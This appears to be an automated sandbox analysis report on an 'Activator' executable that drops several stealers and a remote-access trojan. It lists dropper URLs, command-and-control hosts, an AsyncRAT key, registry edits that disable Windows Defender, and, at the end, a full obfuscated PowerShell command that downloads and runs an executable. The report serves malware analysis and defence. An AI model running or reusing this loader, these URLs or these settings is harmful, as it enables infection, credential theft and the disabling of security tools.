asyncrat | 9f5e45a8d10dab735e9e6571599fe6bc43c5c0e222339aef793c3e46c2fb7e13

Analysis

max time kernel
108s
max time network
146s
platform
windows7_x64
resource
win7v20201028
submitted
05-11-2020 20:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Activator.bin.exe

Score

10^/10

asyncrat azorult modiloader oski raccoon c1c278c0447c880955809027efd04ed6a55b2829 discovery evasion infostealer rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/e7RiX

exe.dropper

http://bit.do/e7RiX

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://nicoslag.ru/asdfg.exe

exe.dropper

http://nicoslag.ru/asdfg.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/e7Rji

exe.dropper

http://bit.do/e7Rji

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://kfdhsa.ru/asdfg.exe

exe.dropper

http://kfdhsa.ru/asdfg.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/e7Rjx

exe.dropper

http://bit.do/e7Rjx

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bratiop.ru/asdfg.exe

exe.dropper

http://bratiop.ru/asdfg.exe

Extracted

Family

raccoon

Botnet

c1c278c0447c880955809027efd04ed6a55b2829

Attributes

url4cnc
https://telete.in/brikitiki

rc4.plain

Extracted

Family

azorult

http://195.245.112.115/index.php

Extracted

Family

oski

morasergiov.ac.ug

Extracted

Family

asyncrat

Version

0.5.7B

agentttt.ac.ug:6970

agentpurple.ac.ug:6970

Mutex

AsyncMutex_6SI8OkPnk

Attributes

aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
anti_detection
false
autorun
false
bdos
false
delay
Default
host
agentttt.ac.ug,agentpurple.ac.ug
hwid
3
install_file
install_folder
%AppData%
mutex
AsyncMutex_6SI8OkPnk
pastebin_config
null
port
6970
version
0.5.7B

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Contains code to disable Windows Defender 8 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral1/memory/2544-259-0x0000000000400000-0x000000000040C000-memory.dmp	disable_win_def
behavioral1/memory/2544-258-0x0000000000400000-0x000000000040C000-memory.dmp	disable_win_def
behavioral1/memory/2544-256-0x000000000040616E-mapping.dmp	disable_win_def
behavioral1/memory/2544-255-0x0000000000400000-0x000000000040C000-memory.dmp	disable_win_def
behavioral1/memory/2612-275-0x0000000000400000-0x0000000000408000-memory.dmp	disable_win_def
behavioral1/memory/2612-274-0x0000000000400000-0x0000000000408000-memory.dmp	disable_win_def
behavioral1/memory/2612-272-0x0000000000403BEE-mapping.dmp	disable_win_def
behavioral1/memory/2612-271-0x0000000000400000-0x0000000000408000-memory.dmp	disable_win_def

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Oski
Oski is an infostealer targeting browser data, crypto wallets.
infostealer oski
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Async RAT payload 4 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/2432-546-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/2432-547-0x000000000040C76E-mapping.dmp	asyncrat
behavioral1/memory/2432-549-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/2432-550-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

ModiLoader Second Stage 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3056-290-0x0000000004640000-0x000000000468D000-memory.dmp	modiloader_stage2

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

11 1312 powershell.exe
13 1312 powershell.exe
14 2004 powershell.exe
18 600 powershell.exe
20 2004 powershell.exe
Downloads MZ/PE file

flow	pid	process
11	1312	powershell.exe
13	1312	powershell.exe
14	2004	powershell.exe
18	600	powershell.exe
20	2004	powershell.exe

Executes dropped EXE 14 IoCs

Processes:

keygen.exemer.exeGBFtrybcvuyt.exeFGrytnvbsdf.exemer.exemrf.exeGBFtrybcvuyt.exeFGrytnvbsdf.exeT0VMmp3AO2.exekPnqVZ0Awg.exe8NjBb6n382.exeQsofULuZQO.exe8NjBb6n382.exeQsofULuZQO.exe

pid	process
1748	keygen.exe
2772	mer.exe
2864	GBFtrybcvuyt.exe
2892	FGrytnvbsdf.exe
2912	mer.exe
2968	mrf.exe
3036	GBFtrybcvuyt.exe
3068	FGrytnvbsdf.exe
1928	T0VMmp3AO2.exe
3056	kPnqVZ0Awg.exe
2488	8NjBb6n382.exe
2520	QsofULuZQO.exe
2544	8NjBb6n382.exe
2612	QsofULuZQO.exe

Loads dropped DLL 31 IoCs

Processes:

cmd.exepowershell.exemer.exepowershell.exeGBFtrybcvuyt.exeFGrytnvbsdf.exeFGrytnvbsdf.exemer.exe8NjBb6n382.exeQsofULuZQO.exe

pid	process
1444	cmd.exe
1312	powershell.exe
1312	powershell.exe
2772	mer.exe
2772	mer.exe
2772	mer.exe
2772	mer.exe
2004	powershell.exe
2004	powershell.exe
2864	GBFtrybcvuyt.exe
2892	FGrytnvbsdf.exe
3068	FGrytnvbsdf.exe
3068	FGrytnvbsdf.exe
3068	FGrytnvbsdf.exe
3068	FGrytnvbsdf.exe
3068	FGrytnvbsdf.exe
2912	mer.exe
2912	mer.exe
2912	mer.exe
2912	mer.exe
2912	mer.exe
2912	mer.exe
2912	mer.exe
2912	mer.exe
2912	mer.exe
2912	mer.exe
2912	mer.exe
2912	mer.exe
2912	mer.exe
2488	8NjBb6n382.exe
2520	QsofULuZQO.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

QsofULuZQO.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	QsofULuZQO.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	QsofULuZQO.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 2 IoCs

Processes:

mer.exe

description	ioc	process
File created	C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini	mer.exe
File opened for modification	C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini	mer.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

mer.exeGBFtrybcvuyt.exeFGrytnvbsdf.exe8NjBb6n382.exeQsofULuZQO.exe

description	pid	process	target process
PID 2772 set thread context of 2912	2772	mer.exe	mer.exe
PID 2864 set thread context of 3036	2864	GBFtrybcvuyt.exe	GBFtrybcvuyt.exe
PID 2892 set thread context of 3068	2892	FGrytnvbsdf.exe	FGrytnvbsdf.exe
PID 2488 set thread context of 2544	2488	8NjBb6n382.exe	8NjBb6n382.exe
PID 2520 set thread context of 2612	2520	QsofULuZQO.exe	QsofULuZQO.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Checks processor information in registry 2 TTPs 1 IoCs
Processor information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

FGrytnvbsdf.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString FGrytnvbsdf.exe
Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

1920 timeout.exe
2632 timeout.exe
1804 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2616 taskkill.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	FGrytnvbsdf.exe

pid	process
1920	timeout.exe
2632	timeout.exe
1804	timeout.exe

pid	process
2616	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exemshta.exemshta.exemshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

mer.exekPnqVZ0Awg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	mer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	mer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	kPnqVZ0Awg.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	kPnqVZ0Awg.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	kPnqVZ0Awg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe8NjBb6n382.exe

pid	process
552	powershell.exe
2004	powershell.exe
600	powershell.exe
1608	powershell.exe
1312	powershell.exe
272	powershell.exe
1608	powershell.exe
1312	powershell.exe
2004	powershell.exe
272	powershell.exe
600	powershell.exe
552	powershell.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

mer.exeGBFtrybcvuyt.exeFGrytnvbsdf.exe

pid process

2772 mer.exe
2864 GBFtrybcvuyt.exe
2892 FGrytnvbsdf.exe

pid	process
2772	mer.exe
2864	GBFtrybcvuyt.exe
2892	FGrytnvbsdf.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

Processes:

keygen.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeAUDIODG.EXEtaskkill.exe8NjBb6n382.exe8NjBb6n382.exeQsofULuZQO.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1748	keygen.exe
Token: SeDebugPrivilege	272	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	600	powershell.exe
Token: SeDebugPrivilege	2004	powershell.exe
Token: SeDebugPrivilege	552	powershell.exe
Token: 33	2704	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2704	AUDIODG.EXE
Token: 33	2704	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2704	AUDIODG.EXE
Token: SeDebugPrivilege	2616	taskkill.exe
Token: SeDebugPrivilege	2488	8NjBb6n382.exe
Token: SeDebugPrivilege	2544	8NjBb6n382.exe
Token: SeDebugPrivilege	2520	QsofULuZQO.exe
Token: SeDebugPrivilege	2960	powershell.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

mer.exeFGrytnvbsdf.exeGBFtrybcvuyt.exemrf.exe8NjBb6n382.exe

pid process

2772 mer.exe
2892 FGrytnvbsdf.exe
2864 GBFtrybcvuyt.exe
2968 mrf.exe
2544 8NjBb6n382.exe
2544 8NjBb6n382.exe

pid	process
2772	mer.exe
2892	FGrytnvbsdf.exe
2864	GBFtrybcvuyt.exe
2968	mrf.exe
2544	8NjBb6n382.exe
2544	8NjBb6n382.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Activator.bin.execmd.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exe

description	pid	process	target process
PID 2024 wrote to memory of 1444	2024	Activator.bin.exe	cmd.exe
PID 2024 wrote to memory of 1444	2024	Activator.bin.exe	cmd.exe
PID 2024 wrote to memory of 1444	2024	Activator.bin.exe	cmd.exe
PID 2024 wrote to memory of 1444	2024	Activator.bin.exe	cmd.exe
PID 1444 wrote to memory of 1896	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1896	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1896	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1896	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1796	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1796	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1796	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1796	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1748	1444	cmd.exe	keygen.exe
PID 1444 wrote to memory of 1748	1444	cmd.exe	keygen.exe
PID 1444 wrote to memory of 1748	1444	cmd.exe	keygen.exe
PID 1444 wrote to memory of 1748	1444	cmd.exe	keygen.exe
PID 1444 wrote to memory of 1804	1444	cmd.exe	timeout.exe
PID 1444 wrote to memory of 1804	1444	cmd.exe	timeout.exe
PID 1444 wrote to memory of 1804	1444	cmd.exe	timeout.exe
PID 1444 wrote to memory of 1804	1444	cmd.exe	timeout.exe
PID 1444 wrote to memory of 1824	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1824	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1824	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1824	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1996	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1996	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1996	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1996	1444	cmd.exe	mshta.exe
PID 1896 wrote to memory of 2004	1896	mshta.exe	powershell.exe
PID 1896 wrote to memory of 2004	1896	mshta.exe	powershell.exe
PID 1896 wrote to memory of 2004	1896	mshta.exe	powershell.exe
PID 1896 wrote to memory of 2004	1896	mshta.exe	powershell.exe
PID 1444 wrote to memory of 1920	1444	cmd.exe	timeout.exe
PID 1444 wrote to memory of 1920	1444	cmd.exe	timeout.exe
PID 1444 wrote to memory of 1920	1444	cmd.exe	timeout.exe
PID 1444 wrote to memory of 1920	1444	cmd.exe	timeout.exe
PID 1796 wrote to memory of 552	1796	mshta.exe	powershell.exe
PID 1796 wrote to memory of 552	1796	mshta.exe	powershell.exe
PID 1796 wrote to memory of 552	1796	mshta.exe	powershell.exe
PID 1796 wrote to memory of 552	1796	mshta.exe	powershell.exe
PID 1824 wrote to memory of 1312	1824	mshta.exe	powershell.exe
PID 1824 wrote to memory of 1312	1824	mshta.exe	powershell.exe
PID 1824 wrote to memory of 1312	1824	mshta.exe	powershell.exe
PID 1824 wrote to memory of 1312	1824	mshta.exe	powershell.exe
PID 1996 wrote to memory of 272	1996	mshta.exe	powershell.exe
PID 1996 wrote to memory of 272	1996	mshta.exe	powershell.exe
PID 1996 wrote to memory of 272	1996	mshta.exe	powershell.exe
PID 1996 wrote to memory of 272	1996	mshta.exe	powershell.exe
PID 1444 wrote to memory of 1580	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1580	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1580	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1580	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1804	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1804	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1804	1444	cmd.exe	mshta.exe
PID 1444 wrote to memory of 1804	1444	cmd.exe	mshta.exe
PID 1580 wrote to memory of 600	1580	mshta.exe	powershell.exe
PID 1580 wrote to memory of 600	1580	mshta.exe	powershell.exe
PID 1580 wrote to memory of 600	1580	mshta.exe	powershell.exe
PID 1580 wrote to memory of 600	1580	mshta.exe	powershell.exe
PID 1804 wrote to memory of 1608	1804	mshta.exe	powershell.exe
PID 1804 wrote to memory of 1608	1804	mshta.exe	powershell.exe
PID 1804 wrote to memory of 1608	1804	mshta.exe	powershell.exe
PID 1804 wrote to memory of 1608	1804	mshta.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\Activator.bin.exe
"C:\Users\Admin\AppData\Local\Temp\Activator.bin.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2024
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\1287.tmp\start2.bat" C:\Users\Admin\AppData\Local\Temp\Activator.bin.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1444
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1287.tmp\m1.hta"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1896
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$szhwgxcryvu = Get-Random -Min 3 -Max 4;$ndwmoasgtib = ([char[]]([char]97..[char]122));$fgozevw = -join ($ndwmoasgtib | Get-Random -Count $szhwgxcryvu | % {[Char]$_});$rgdkpfev = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$teqpigc = $fgozevw + $rgdkpfev;$ynbaxglmcto=[char]0x53+[char]0x61+[char]0x4c;$bdashvjgm=[char]0x49+[char]0x45+[char]0x58;$hiczpfnwvbq=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL imhur $ynbaxglmcto;$sdgihptjon=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;imhur pkzwjshtlmgd $bdashvjgm;$ohnts=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pkzwjshtlmgd;imhur brvxmhkwft $hiczpfnwvbq;$ricjm = $ohnts + [char]0x5c + $teqpigc;;;;$unfec = 'aHR0cDovL2JpdC5kby9lN1JpWA==';$unfec=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($unfec));$gzuywpnci = New-Object $sdgihptjon;$urhwmqvp = $gzuywpnci.DownloadData($unfec);[IO.File]::WriteAllBytes($ricjm, $urhwmqvp);brvxmhkwft $ricjm;;$phqcjzd = @($wyotgpfu, $yogsjpf, $ytnbhwxqg, $ukitlj);foreach($skbuoerj in $phqcjzd){$null = $_}""
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
